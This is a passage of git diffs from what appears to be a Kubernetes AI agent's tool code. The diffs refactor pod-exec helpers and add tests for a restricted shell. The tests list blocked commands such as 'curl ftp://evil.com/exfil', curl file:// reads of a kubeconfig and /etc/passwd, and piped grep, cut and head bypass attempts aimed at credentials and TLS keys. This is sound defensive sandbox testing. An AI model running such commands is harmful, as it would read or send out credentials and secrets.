-              "get",
-              "pod",
-              podName,
-              "-o",
-              "jsonpath={.status.containerStatuses[0].state.terminated.exitCode}",
-            ],
-            5_000,
-            env,
-          );
-          const code = parseInt(statusResult.stdout.trim(), 10);
-          if (!isNaN(code)) exitCode = code;
-        } catch {
-          // ignore
-        }
-
-        // Phase 5: Cleanup
-        cleanup();
-
-        const filteredStderr = filterPodNoise(stderr);
-        const output =
-          stdout.trim() +
-          (filteredStderr ? `\n\nSTDERR:\n${filteredStderr}` : "");
-
-        if (exitCode === 0 || (exitCode === null && stdout.trim())) {
-          return {
-            content: [{ type: "text", text: processToolOutput(output) }],
-            details: { exitCode: exitCode ?? 0 },
-          };
-        } else {
-          const errOutput = `Exit code: ${exitCode ?? "unknown"}\n${output}`;
-          return {
-            content: [{ type: "text", text: processToolOutput(errOutput) }],
-            details: { exitCode, error: true },
-          };
-        }
-      } catch (err: any) {
-        cleanup();
-        const output = `Exit code: ${err.code ?? "unknown"}\n${err.stdout?.trim() ?? ""}\n${err.stderr?.trim() ?? err.message}`;
+      if (signal?.aborted) {
         return {
-          content: [{ type: "text", text: processToolOutput(output) }],
-          details: { exitCode: err.code, error: true },
+          content: [{ type: "text", text: "Aborted." }],
+          details: { error: true },
         };
       }
+
+      return formatExecOutput(execResult);
     },
   };
 }

--- a/src/tools/pod-exec.ts
+++ b/src/tools/pod-exec.ts
@@ -6,25 +6,14 @@ import type { ToolDefinition } from "@mariozechner/pi-coding-agent";
 import type { KubeconfigRef } from "../core/agent-factory.js";
 import { renderTextResult, processToolOutput } from "./tool-render.js";
 import { checkPodRunning } from "./k8s-checks.js";
-import { resolveKubeconfigPath } from "./kubeconfig-resolver.js";
-import { sanitizeEnv } from "./sanitize-env.js";
-import { validateCommand } from "./node-exec.js";
 import { parseArgs } from "./command-sets.js";
+import { validateCommand } from "./command-validator.js";
+import { validatePodName, prepareExecEnv } from "./exec-utils.js";
 
 const execFileAsync = promisify(execFile);
 
-// Valid pod name: RFC 1123 subdomain
-const POD_NAME_RE = /^[a-z0-9][a-z0-9.\-]*$/;
-
-export function validatePodName(pod: string): string | null {
-  if (!pod || !pod.trim()) {
-    return "Pod name must not be empty.";
-  }
-  if (!POD_NAME_RE.test(pod)) {
-    return `Invalid pod name "${pod}". Pod names may only contain lowercase letters, digits, hyphens, and dots.`;
-  }
-  return null;
-}
+// Re-export for backward compatibility (tests + downstream imports)
+export { validatePodName } from "./exec-utils.js";
 
 interface PodExecParams {
   pod: string;
@@ -105,13 +94,7 @@ Examples:
     renderResult: renderTextResult,
     async execute(_toolCallId, rawParams) {
       const params = rawParams as PodExecParams;
-      const kubeconfigPath = resolveKubeconfigPath(kubeconfigRef?.credentialsDir);
-      const kubeconfigArgs = kubeconfigPath ? [`--kubeconfig=${kubeconfigPath}`] : [];
-      const childEnv = {
-        ...sanitizeEnv(process.env as Record<string, string>),
-        ...(kubeconfigRef?.credentialsDir ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir } : {}),
-        KUBECONFIG: "/dev/null",
-      };
+      const env = prepareExecEnv(kubeconfigRef);
       const pod = params.pod?.trim();
       const namespace = params.namespace?.trim() || "default";
 
@@ -124,8 +107,8 @@ Examples:
         };
       }
 
-      // Validate command (reuse node-exec's validation — same whitelist + metachar + restrictions)
-      const cmdErr = validateCommand(params.command);
+      // Validate command
+      const cmdErr = validateCommand(params.command, { context: "pod" });
       if (cmdErr) {
         return {
           content: [{ type: "text", text: cmdErr }],
@@ -134,7 +117,9 @@ Examples:
       }
 
       // Check pod exists and is Running
-      const podCheckErr = await checkPodRunning(pod, namespace, childEnv, kubeconfigPath ?? undefined);
+      const podCheckErr = await checkPodRunning(
+        pod, namespace, env.childEnv, env.kubeconfigPath ?? undefined,
+      );
       if (podCheckErr) {
         return {
           content: [{ type: "text", text: JSON.stringify({ error: podCheckErr }, null, 2) }],
@@ -146,7 +131,7 @@ Examples:
       const cmdArgs = parseArgs(params.command);
 
       // Build kubectl exec args
-      const kubectlArgs = [...kubeconfigArgs, "exec", pod, "-n", namespace];
+      const kubectlArgs = [...env.kubeconfigArgs, "exec", pod, "-n", namespace];
       if (params.container?.trim()) {
         kubectlArgs.push("-c", params.container.trim());
       }
@@ -156,7 +141,7 @@ Examples:
         const { stdout, stderr } = await execFileAsync(
           "kubectl",
           kubectlArgs,
-          { timeout, env: childEnv },
+          { timeout, env: env.childEnv },
         );
 
         const output = stdout.trim() + (stderr.trim() ? `\n\nSTDERR:\n${stderr.trim()}` : "");

--- a/src/tools/pod-nsenter-exec.ts
+++ b/src/tools/pod-nsenter-exec.ts
@@ -1,66 +1,20 @@
 import { Type } from "@sinclair/typebox";
-import { spawn } from "node:child_process";
-import { randomBytes } from "node:crypto";
 import { Text } from "@mariozechner/pi-tui";
 import type { ToolDefinition } from "@mariozechner/pi-coding-agent";
 import type { KubeconfigRef } from "../core/agent-factory.js";
-import { renderTextResult, processToolOutput } from "./tool-render.js";
-import { checkNodeReady, waitForPodDone } from "./k8s-checks.js";
-import { validateCommand } from "./node-exec.js";
-import { parseArgs } from "./command-sets.js";
-import { validatePodName } from "./pod-exec.js";
+import { renderTextResult } from "./tool-render.js";
 import { loadConfig } from "../core/config.js";
-import { sanitizeEnv } from "./sanitize-env.js";
+import { parseArgs } from "./command-sets.js";
+import { validateCommand } from "./command-validator.js";
+import {
+  validatePodName,
+  prepareExecEnv,
+  resolveContainerNetns,
+  runInDebugPod,
+  formatExecOutput,
+} from "./exec-utils.js";
 
 const DEFAULT_IMAGE = loadConfig().debugImage;
-
-// Valid pod name: RFC 1123 subdomain
-const POD_NAME_RE = /^[a-z0-9][a-z0-9.\-]*$/;
-
-function spawnAsync(
-  cmd: string,
-  args: string[],
-  timeout: number,
-  env?: NodeJS.ProcessEnv,
-): Promise<{ stdout: string; stderr: string }> {
-  return new Promise((resolve, reject) => {
-    let stdout = "";
-    let stderr = "";
-    const child = spawn(cmd, args, {
-      stdio: ["ignore", "pipe", "pipe"],
-      env,
-    });
-    child.stdout.on("data", (chunk: Buffer) => {
-      stdout += chunk.toString();
-    });
-    child.stderr.on("data", (chunk: Buffer) => {
-      stderr += chunk.toString();
-    });
-    const timer = setTimeout(() => {
-      child.kill("SIGKILL");
-    }, timeout);
-    child.on("close", (code) => {
-      clearTimeout(timer);
-      if (code === 0) resolve({ stdout, stderr });
-      else
-        reject(
-          Object.assign(new Error(`exit ${code}`), { code, stdout, stderr }),
-        );
-    });
-    child.on("error", (err) => {
-      clearTimeout(timer);
-      reject(err);
-    });
-  });
-}
-
-function filterPodNoise(stderr: string): string {
-  return stderr
-    .split("\n")
-    .filter((line) => !line.match(/^pod "node-debug-.*" deleted$/))
-    .join("\n")
-    .trim();
-}
 
 interface PodNsenterExecParams {
   pod: string;
@@ -143,13 +97,9 @@ Examples:
       );
     },
     renderResult: renderTextResult,
-    async execute(_toolCallId, rawParams) {
+    async execute(_toolCallId, rawParams, signal) {
       const params = rawParams as PodNsenterExecParams;
-      const env = {
-        ...sanitizeEnv(process.env as Record<string, string>),
-        ...(kubeconfigRef?.credentialsDir ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir } : {}),
-        KUBECONFIG: "/dev/null",
-      };
+      const env = prepareExecEnv(kubeconfigRef);
       const pod = params.pod?.trim();
       const namespace = params.namespace?.trim() || "default";
 
@@ -163,7 +113,7 @@ Examples:
       }
 
       // Validate command
-      const cmdErr = validateCommand(params.command);
+      const cmdErr = validateCommand(params.command, { context: "nsenter" });
       if (cmdErr) {
         return {
           content: [{ type: "text", text: cmdErr }],
@@ -171,106 +121,15 @@ Examples:
         };
       }
 
-      // Step 1: Get pod phase + node in one call
-      let nodeName: string;
-      try {
-        const result = await spawnAsync(
-          "kubectl",
-          [
-            "get", "pod", pod, "-n", namespace,
-            "-o", "jsonpath={.status.phase},{.spec.nodeName}",
-          ],
-          10_000,
-          env,
-        );
-        const parts = result.stdout.trim().split(",");
-        const phase = parts[0];
-        nodeName = parts[1] || "";
-        if (phase !== "Running") {
-          return {
-            content: [{
-              type: "text",
-              text: `Error: Pod "${pod}" in namespace "${namespace}" is not Running (phase: ${phase || "unknown"}). Cannot enter its network namespace.`,
-            }],
-            details: { error: true },
-          };
-        }
-        if (!nodeName) {
-          return {
-            content: [{
-              type: "text",
-              text: `Error: could not determine node for pod "${pod}" in namespace "${namespace}".`,
-            }],
-            details: { error: true },
-          };
-        }
-      } catch (err: any) {
-        const stderr = (err.stderr?.trim() || err.message) as string;
-        if (stderr.includes("not found")) {
-          return {
-            content: [{
-              type: "text",
-              text: `Error: Pod "${pod}" not found in namespace "${namespace}". Check the pod name and namespace.`,
-            }],
-            details: { error: true },
-          };
-        }
+      // Resolve container network namespace (pod phase + node + container ID)
+      const netns = await resolveContainerNetns(pod, namespace, params.container, env);
+      if ("error" in netns) {
         return {
-          content: [{
-            type: "text",
-            text: `Error: failed to get pod info: ${stderr}`,
-          }],
+          content: [{ type: "text", text: `Error: ${netns.error}` }],
           details: { error: true },
         };
       }
 
-      // Check node is Ready before creating debug pod
-      const nodeCheckErr = await checkNodeReady(nodeName, env);
-      if (nodeCheckErr) {
-        return {
-          content: [{ type: "text", text: `Error: ${nodeCheckErr}` }],
-          details: { error: true },
-        };
-      }
-
-      // Step 2: Get the container ID
-      let containerID: string;
-      try {
-        const jsonpathExpr = params.container?.trim()
-          ? `{.status.containerStatuses[?(@.name=="${params.container.trim()}")].containerID}`
-          : "{.status.containerStatuses[0].containerID}";
-        const result = await spawnAsync(
-          "kubectl",
-          ["get", "pod", pod, "-n", namespace, "-o", `jsonpath=${jsonpathExpr}`],
-          10_000,
-          env,
-        );
-        containerID = result.stdout.trim();
-        if (!containerID) {
-          return {
-            content: [{
-              type: "text",
-              text: `Error: could not determine container ID for pod "${pod}". Is the pod running?`,
-            }],
-            details: { error: true },
-          };
-        }
-        // Strip the runtime prefix (e.g. "containerd://")
-        const prefixIdx = containerID.indexOf("://");
-        if (prefixIdx !== -1) {
-          containerID = containerID.slice(prefixIdx + 3);
-        }
-      } catch (err: any) {
-        return {
-          content: [{
-            type: "text",
-            text: `Error: failed to get container ID: ${err.stderr?.trim() || err.message}`,
-          }],
-          details: { error: true },
-        };
-      }
-
-      // Step 3: Build debug pod with nsenter into pod's netns
       const image = params.image || DEFAULT_IMAGE;
       const timeout = Math.min(params.timeout_seconds ?? 30, 120) * 1000;
       const cmdArgs = parseArgs(params.command);
@@ -282,7 +141,7 @@ Examples:
       // then uses inner nsenter to enter only the pod's network namespace.
       // unshare --mount + sysfs remount ensures /sys reflects the pod's netns.
       const innerScript = `
-CONTAINER_ID="${containerID}"
+CONTAINER_ID="${netns.containerID}"
 PID=$(crictl inspect "$CONTAINER_ID" 2>/dev/null | jq -r ".info.pid")
 if [ -z "$PID" ] || [ "$PID" = "null" ]; then
   echo "Error: cannot find PID for container $CONTAINER_ID" >&2
@@ -291,119 +150,25 @@ fi
 unshare --mount sh -c 'nsenter -t '"$PID"' -n -- mount -t sysfs none /sys 2>/dev/null; nsenter -t '"$PID"' -n -- ${escapedArgs}'
 `.trim();
 
-      const podId = randomBytes(4).toString("hex");
-      const podName = `node-debug-${podId}`;
+      const nsenterCmd = [
+        "nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p",
+        "--", "sh", "-c", innerScript,
+      ];
 
-      const overrides = JSON.stringify({
-        spec: {
-          nodeName,
-          hostPID: true,
-          hostNetwork: true,
-          containers: [{
-            name: podName,
-            image,
-            securityContext: { privileged: true },
-            command: [
-              "nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p",
-              "--", "sh", "-c", innerScript,
-            ],
-          }],
-          restartPolicy: "Never",
-        },
-      });
+      const execResult = await runInDebugPod(
+        { nodeName: netns.nodeName, command: nsenterCmd, image },
+        env,
+        { timeoutMs: timeout, signal },
+      );
 
-      try {
-        // Phase 1: Create pod
-        await spawnAsync(
-          "kubectl",
-          [
-            "run", podName,
-            "--restart=Never",
-            `--image=${image}`,
-            `--overrides=${overrides}`,
-          ],
-          30_000,
-          env,
-        );
-
-        // Phase 2: Wait for pod to reach terminal phase (Succeeded or Failed)
-        try {
-          await waitForPodDone(podName, timeout, env);
-        } catch {
-          // Timed out — still fetch logs before cleanup
-        }
-
-        // Phase 3: Fetch logs
-        let stdout = "";
-        let stderr = "";
-        try {
-          const logsResult = await spawnAsync(
-            "kubectl", ["logs", podName], 10_000, env,
-          );
-          stdout = logsResult.stdout;
-          stderr = logsResult.stderr;
-        } catch (logErr: any) {
-          stdout = logErr.stdout ?? "";
-          stderr = logErr.stderr ?? "";
-        }
-
-        // Phase 4: Get exit code
-        let exitCode: number | null = null;
-        try {
-          const statusResult = await spawnAsync(
-            "kubectl",
-            [
-              "get", "pod", podName,
-              "-o", "jsonpath={.status.containerStatuses[0].state.terminated.exitCode}",
-            ],
-            5_000,
-            env,
-          );
-          const code = parseInt(statusResult.stdout.trim(), 10);
-          if (!isNaN(code)) exitCode = code;
-        } catch {
-          // ignore
-        }
-
-        // Phase 5: Cleanup
-        spawnAsync(
-          "kubectl",
-          ["delete", "pod", podName, "--force", "--grace-period=0"],
-          10_000,
-          env,
-        ).catch(() => {});
-
-        const filteredStderr = filterPodNoise(stderr);
-        const output =
-          stdout.trim() +
-          (filteredStderr ? `\n\nSTDERR:\n${filteredStderr}` : "");
-
-        if (exitCode === 0 || (exitCode === null && stdout.trim())) {
-          return {
-            content: [{ type: "text", text: processToolOutput(output) }],
-            details: { exitCode: exitCode ?? 0 },
-          };
-        } else {
-          const errOutput = `Exit code: ${exitCode ?? "unknown"}\n${output}`;
-          return {
-            content: [{ type: "text", text: processToolOutput(errOutput) }],
-            details: { exitCode, error: true },
-          };
-        }
-      } catch (err: any) {
-        // Cleanup on unexpected error
-        spawnAsync(
-          "kubectl",
-          ["delete", "pod", podName, "--force", "--grace-period=0"],
-          10_000,
-          env,
-        ).catch(() => {});
-        const output = `Exit code: ${err.code ?? "unknown"}\n${err.stdout?.trim() ?? ""}\n${err.stderr?.trim() ?? err.message}`;
+      if (signal?.aborted) {
         return {
-          content: [{ type: "text", text: processToolOutput(output) }],
-          details: { exitCode: err.code, error: true },
+          content: [{ type: "text", text: "Aborted." }],
+          details: { error: true },
         };
       }
+
+      return formatExecOutput(execResult);
     },
   };
 }

--- a/src/tools/pod-script.ts
+++ b/src/tools/pod-script.ts
@@ -6,9 +6,8 @@ import type { KubeconfigRef } from "../core/agent-factory.js";
 import { resolveScript } from "./script-resolver.js";
 import { processToolOutput, renderTextResult } from "./tool-render.js";
 import { checkPodRunning } from "./k8s-checks.js";
-import { resolveKubeconfigPath } from "./kubeconfig-resolver.js";
-import { sanitizeEnv } from "./sanitize-env.js";
 import { parseArgs, shellEscape } from "./command-sets.js";
+import { validatePodName, prepareExecEnv } from "./exec-utils.js";
 
 interface PodScriptParams {
   pod: string;
@@ -19,9 +18,6 @@ interface PodScriptParams {
   args?: string;
   timeout_seconds?: number;
 }
-
-// Valid pod name: RFC 1123 subdomain
-const POD_NAME_RE = /^[a-z0-9][a-z0-9.\-]*$/;
 
 export function createPodScriptTool(kubeconfigRef?: KubeconfigRef): ToolDefinition {
   return {
@@ -87,17 +83,18 @@ Examples:
     }),
     async execute(_toolCallId, rawParams, signal) {
       const params = rawParams as PodScriptParams;
+      const env = prepareExecEnv(kubeconfigRef);
       const pod = params.pod?.trim();
       const namespace = params.namespace?.trim() || "default";
 
-      if (!pod || !POD_NAME_RE.test(pod)) {
+      // Validate pod name
+      const podErr = validatePodName(pod);
+      if (podErr) {
         return {
-          content: [
-            {
-              type: "text",
-              text: `Error: invalid pod name "${pod}". Pod names may only contain lowercase letters, digits, hyphens, and dots.`,
-            },
-          ],
+          content: [{
+            type: "text",
+            text: `Error: invalid pod name "${pod}". Pod names may only contain lowercase letters, digits, hyphens, and dots.`,
+          }],
           details: { error: true },
         };
       }
@@ -120,14 +117,9 @@ Examples:
       const timeout = Math.min(params.timeout_seconds ?? 180, 300) * 1000;
 
       // Pre-check: pod exists and is Running
-      const kubeconfigPath = resolveKubeconfigPath(kubeconfigRef?.credentialsDir);
-      const kubeconfigArgs = kubeconfigPath ? [`--kubeconfig=${kubeconfigPath}`] : [];
-      const childEnv = {
-        ...sanitizeEnv(process.env as Record<string, string>),
-        ...(kubeconfigRef?.credentialsDir ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir } : {}),
-        KUBECONFIG: "/dev/null",
-      };
-      const podCheckErr = await checkPodRunning(pod, namespace, childEnv, kubeconfigPath ?? undefined);
+      const podCheckErr = await checkPodRunning(
+        pod, namespace, env.childEnv, env.kubeconfigPath ?? undefined,
+      );
       if (podCheckErr) {
         return {
           content: [{ type: "text", text: `Error: ${podCheckErr}` }],
@@ -136,7 +128,7 @@ Examples:
       }
 
       // Build kubectl exec args
-      const kubectlArgs = [...kubeconfigArgs, "exec", "-i", pod, "-n", namespace];
+      const kubectlArgs = [...env.kubeconfigArgs, "exec", "-i", pod, "-n", namespace];
       if (params.container?.trim()) {
         kubectlArgs.push("-c", params.container.trim());
       }
@@ -154,7 +146,7 @@ Examples:
 
         const child = spawn("kubectl", kubectlArgs, {
           stdio: ["pipe", "pipe", "pipe"],
-          env: childEnv,
+          env: env.childEnv,
         });
 
         const onAbort = () => child.kill("SIGKILL");

--- a/src/tools/restricted-bash.test.ts
+++ b/src/tools/restricted-bash.test.ts
@@ -898,6 +898,81 @@ describe("createRestrictedBashTool — curl is now allowed with restrictions", (
     expect(result.content[0].text).toContain("@file");
     expect((result.details as any).blocked).toBe(true);
   });
+
+  it("blocks curl file:// protocol (local file reading)", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl file:///app/.siclaw/credentials/roce-test.kubeconfig" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("blocked protocol");
+    expect((result.details as any).blocked).toBe(true);
+  });
+
+  it("blocks curl ftp:// protocol", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl ftp://evil.com/exfil" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("blocked protocol");
+    expect((result.details as any).blocked).toBe(true);
+  });
+
+  it("blocks curl dict:// protocol", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl dict://evil.com/info" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("blocked protocol");
+    expect((result.details as any).blocked).toBe(true);
+  });
+
+  it("blocks curl gopher:// protocol", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl gopher://evil.com/" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("blocked protocol");
+    expect((result.details as any).blocked).toBe(true);
+  });
+
+  it("allows curl http:// (normal usage)", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl --connect-timeout 1 http://192.0.2.1/api" },
+      undefined,
+      {} as any
+    );
+    expect((result.details as any).blocked).toBeFalsy();
+  }, 10_000);
+
+  it("allows curl https:// (normal usage)", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl -sk --connect-timeout 1 https://192.0.2.1/healthz" },
+      undefined,
+      {} as any
+    );
+    expect((result.details as any).blocked).toBeFalsy();
+  }, 10_000);
+
+  it("blocks curl file:// in pipeline", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "curl -s file:///etc/passwd | head -5" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("blocked protocol");
+    expect((result.details as any).blocked).toBe(true);
+  });
 });
 
 describe("createRestrictedBashTool — sysctl/mount/env restrictions", () => {

--- a/src/tools/restricted-bash.test.ts
+++ b/src/tools/restricted-bash.test.ts
@@ -630,7 +630,7 @@ describe("createRestrictedBashTool — blocks dangerous options in pipelines", (
 describe("createRestrictedBashTool — find validation", () => {
   const tool = createRestrictedBashTool();
 
-  // find is in LOCAL_BLOCKED_COMMANDS (local file access blocked in restricted-bash).
+  // find is not in the "local" context whitelist (file category excluded).
   // These commands are allowed in node-exec/pod-exec (tested in command-sets.test.ts).
   it("blocks find in restricted-bash (local file access)", async () => {
     const result = await tool.execute(
@@ -883,7 +883,7 @@ describe("createRestrictedBashTool — sysctl/mount/env restrictions", () => {
     expect((result.details as any).blocked).toBe(true);
   });
 
-  // env is in LOCAL_BLOCKED_COMMANDS (may expose secrets locally).
+  // env is not in the "local" context whitelist (general-env category excluded).
   // The validateEnv restriction is tested in command-sets.test.ts for remote contexts.
   it("blocks env command in restricted-bash (local secret exposure)", async () => {
     const result = await tool.execute(
@@ -1054,7 +1054,7 @@ describe("createRestrictedBashTool — new DevOps command restrictions", () => {
     expect((result.details as any).blocked).toBe(true);
   });
 
-  // lsof and zcat are in LOCAL_BLOCKED_COMMANDS (local file/process inspection blocked).
+  // lsof and zcat are not in the "local" context whitelist (inspection/compressed categories excluded).
   // They are allowed in node-exec/pod-exec (tested in command-sets.test.ts).
   it("blocks lsof in restricted-bash (local file inspection)", async () => {
     const result = await tool.execute(
@@ -1067,7 +1067,7 @@ describe("createRestrictedBashTool — new DevOps command restrictions", () => {
     expect((result.details as any).blocked).toBe(true);
   });
 
-  // timedatectl is NOT in LOCAL_BLOCKED_COMMANDS, so it passes through
+  // timedatectl is in the "local" context whitelist (services category), so it passes through
   it("allows timedatectl (no validator needed)", async () => {
     const result = await tool.execute(
       "test-id",

--- a/src/tools/restricted-bash.test.ts
+++ b/src/tools/restricted-bash.test.ts
@@ -11,6 +11,7 @@ import {
   validateIpInPipeline,
   ALLOWED_BINARIES,
 } from "./restricted-bash.js";
+import { extractPipeline } from "./command-validator.js";
 
 describe("extractCommands", () => {
   it("splits pipe", () => {
@@ -70,6 +71,67 @@ describe("extractCommands", () => {
       "kubectl exec pod-a -- ib_write_bw & sleep 2 && kubectl exec pod-b -- ib_write_bw 10.0.0.1"
     );
     expect(cmds.length).toBeGreaterThanOrEqual(3);
+  });
+});
+
+describe("extractPipeline", () => {
+  it("marks commands after | as piped", () => {
+    const result = extractPipeline("kubectl get pods | grep Error");
+    expect(result).toEqual([
+      { command: "kubectl get pods", piped: false },
+      { command: "grep Error", piped: true },
+    ]);
+  });
+
+  it("marks commands after && as not piped", () => {
+    const result = extractPipeline("sleep 2 && grep pattern file");
+    expect(result).toEqual([
+      { command: "sleep 2", piped: false },
+      { command: "grep pattern file", piped: false },
+    ]);
+  });
+
+  it("marks commands after || as not piped", () => {
+    const result = extractPipeline("cmd1 || grep fallback");
+    expect(result).toEqual([
+      { command: "cmd1", piped: false },
+      { command: "grep fallback", piped: false },
+    ]);
+  });
+
+  it("marks commands after ; as not piped", () => {
+    const result = extractPipeline("echo done; cut -f1 file");
+    expect(result).toEqual([
+      { command: "echo done", piped: false },
+      { command: "cut -f1 file", piped: false },
+    ]);
+  });
+
+  it("handles mixed operators", () => {
+    const result = extractPipeline("cmd1 | cmd2 && cmd3 | cmd4");
+    expect(result).toEqual([
+      { command: "cmd1", piped: false },
+      { command: "cmd2", piped: true },
+      { command: "cmd3", piped: false },
+      { command: "cmd4", piped: true },
+    ]);
+  });
+
+  it("handles triple pipe chain", () => {
+    const result = extractPipeline("kubectl get pods -A | grep error | wc -l");
+    expect(result).toEqual([
+      { command: "kubectl get pods -A", piped: false },
+      { command: "grep error", piped: true },
+      { command: "wc -l", piped: true },
+    ]);
+  });
+
+  it("handles >&2 fd duplication (not a separator)", () => {
+    const result = extractPipeline("echo error >&2 | grep error");
+    expect(result).toEqual([
+      { command: "echo error >&2", piped: false },
+      { command: "grep error", piped: true },
+    ]);
   });
 });
 
@@ -1088,4 +1150,117 @@ describe("createRestrictedBashTool — new DevOps command restrictions", () => {
     expect(result.content[0].text).toContain("disallowed command");
     expect((result.details as any).blocked).toBe(true);
   });
+});
+
+describe("createRestrictedBashTool — pipe-only text command enforcement", () => {
+  const tool = createRestrictedBashTool();
+
+  // Blocked: text commands used standalone (can read files directly)
+  const blockedStandalone = [
+    { cmd: "grep -r '' /app/.siclaw", bin: "grep" },
+    { cmd: "cut -c1-2000 /home/agentbox/.siclaw/credentials/kubeconfig", bin: "cut" },
+    { cmd: "head -n 100 /etc/siclaw/certs/tls.key", bin: "head" },
+    { cmd: "tail -f /var/log/syslog", bin: "tail" },
+    { cmd: "sort /etc/passwd", bin: "sort" },
+    { cmd: "wc -l /proc/self/environ", bin: "wc" },
+    { cmd: "jq . /app/.siclaw/config/settings.json", bin: "jq" },
+    { cmd: "uniq /some/file", bin: "uniq" },
+    { cmd: "column -t /etc/fstab", bin: "column" },
+    { cmd: "yq . /app/config.yaml", bin: "yq" },
+  ];
+
+  for (const { cmd, bin } of blockedStandalone) {
+    it(`blocks standalone: ${cmd}`, async () => {
+      const result = await tool.execute(
+        "test-id",
+        { command: cmd },
+        undefined,
+        {} as any
+      );
+      expect(result.content[0].text).toContain("can only be used after a pipe");
+      expect(result.content[0].text).toContain(bin);
+      expect((result.details as any).blocked).toBe(true);
+    });
+  }
+
+  // Blocked: text commands after && or ; (not piped)
+  it("blocks grep after && (not a pipe)", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "true && grep -r '' /app/.siclaw" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("can only be used after a pipe");
+    expect((result.details as any).blocked).toBe(true);
+  });
+
+  it("blocks cut after ; (not a pipe)", async () => {
+    const result = await tool.execute(
+      "test-id",
+      { command: "echo done; cut -c1-2000 /etc/passwd" },
+      undefined,
+      {} as any
+    );
+    expect(result.content[0].text).toContain("can only be used after a pipe");
+    expect((result.details as any).blocked).toBe(true);
+  });
+
+  // Allowed: text commands after pipe |
+  const allowedPiped = [
+    "kubectl get pods -A | grep Running",
+    "kubectl get pods -o json | jq '.items[]'",
+    "kubectl get pods -A | grep -i error | wc -l",
+    "kubectl logs my-pod | tail -100",
+    "kubectl get nodes -o json | jq . | sort",
+    "echo test | cut -f1 -d,",
+    "echo 'hello world' | tr ' ' '\\n'",
+    "kubectl top pods | head -5",
+    "kubectl get pods -A | sort | uniq -c",
+    "echo 'a,b,c' | column -t -s,",
+    "kubectl get pods | grep Error | wc -l",
+    "echo test | grep test",
+  ];
+
+  for (const cmd of allowedPiped) {
+    it(`allows piped: ${cmd}`, async () => {
+      const result = await tool.execute(
+        "test-id",
+        { command: cmd },
+        undefined,
+        {} as any
+      );
+      expect(result.content[0].text).not.toContain("can only be used after a pipe");
+      expect((result.details as any).blocked).toBeFalsy();
+    });
+  }
+
+  // Blocked: piped text commands with file path arguments (bypass attempt)
+  const blockedPipedWithFiles = [
+    { cmd: "kubectl get pods | grep -rl '' /app/.siclaw", reason: "recursive" },
+    { cmd: "echo x | grep -rn pattern /etc/", reason: "recursive" },
+    { cmd: "echo x | grep -R secret /app/", reason: "recursive" },
+    { cmd: "echo x | grep --recursive pattern /var/", reason: "recursive" },
+    { cmd: "echo x | cut -c1-2000 /home/agentbox/.siclaw/credentials/kubeconfig", reason: "file path" },
+    { cmd: "echo x | head -n5 /etc/siclaw/certs/tls.key", reason: "file path" },
+    { cmd: "echo x | tail -100 /var/log/syslog", reason: "file path" },
+    { cmd: "echo x | sort /etc/passwd", reason: "file path" },
+    { cmd: "echo x | jq . /app/.siclaw/config/settings.json", reason: "file path" },
+    { cmd: "echo x | wc -l ./secret.txt", reason: "file path" },
+    { cmd: "echo x | head -n1 ../../../etc/passwd", reason: "file path" },
+    { cmd: "echo x | cut -f1 ~/credentials.txt", reason: "file path" },
+    { cmd: "echo x | grep -inR '' /app/.siclaw", reason: "recursive" },
+  ];
+
+  for (const { cmd, reason } of blockedPipedWithFiles) {
+    it(`blocks piped with ${reason}: ${cmd}`, async () => {
+      const result = await tool.execute(
+        "test-id",
+        { command: cmd },
+        undefined,
+        {} as any
+      );
+      expect((result.details as any).blocked).toBe(true);
+    });
+  }
 });

--- a/src/tools/restricted-bash.ts
+++ b/src/tools/restricted-bash.ts
@@ -273,7 +273,16 @@ Do NOT use for non-kubectl tasks (file editing, package management, etc.).`,
           );
         }
 
-        const child = exec(finalCommand, execOpts as any);
+        // In production (K8s pods), run child processes as sandbox user.
+        // sudo's SUID elevates to root, then drops to sandbox.
+        // -E preserves our sanitized env (allowed by SETENV in sudoers).
+        let execCommand = finalCommand;
+        if (process.env.NODE_ENV === "production") {
+          const escaped = finalCommand.replace(/'/g, "'\\''");
+          execCommand = `sudo -E -u sandbox -- bash -c '${escaped}'`;
+        }
+
+        const child = exec(execCommand, execOpts as any);
 
         // Kill the entire process group (shell + all child processes like kubectl exec)
         // detached: true makes the shell a process group leader, so -pid kills the whole group

--- a/src/tools/restricted-bash.ts
+++ b/src/tools/restricted-bash.ts
@@ -158,9 +158,12 @@ export function isSkillScript(cmd: string): boolean {
 // ── Sensitive path patterns ──────────────────────────────────────────
 
 const SENSITIVE_PATH_RE = [
-  /\.siclaw\/config\/settings\.json/,
-  /\.siclaw\/credentials\//,
+  /\.siclaw\//,
   /\$\{?KUBECONFIG\}?/,
+  /\/etc\/siclaw\//,
+  /\.kube\//,
+  /\/proc\/self\/environ/,
+  /\.credentials\//,
 ];
 
 // ── Tool definition ─────────────────────────────────────────────────

--- a/src/tools/restricted-bash.ts
+++ b/src/tools/restricted-bash.ts
@@ -158,7 +158,8 @@ export function isSkillScript(cmd: string): boolean {
 // ── Sensitive path patterns ──────────────────────────────────────────
 
 const SENSITIVE_PATH_RE = [
-  /\.siclaw\//,
+  /\.siclaw\/credentials\//,
+  /\.siclaw\/config\//,
   /\$\{?KUBECONFIG\}?/,
   /\/etc\/siclaw\//,
   /\.kube\//,

--- a/src/tools/restricted-bash.ts
+++ b/src/tools/restricted-bash.ts
@@ -10,183 +10,26 @@ import { processToolOutput, renderTextResult } from "./tool-render.js";
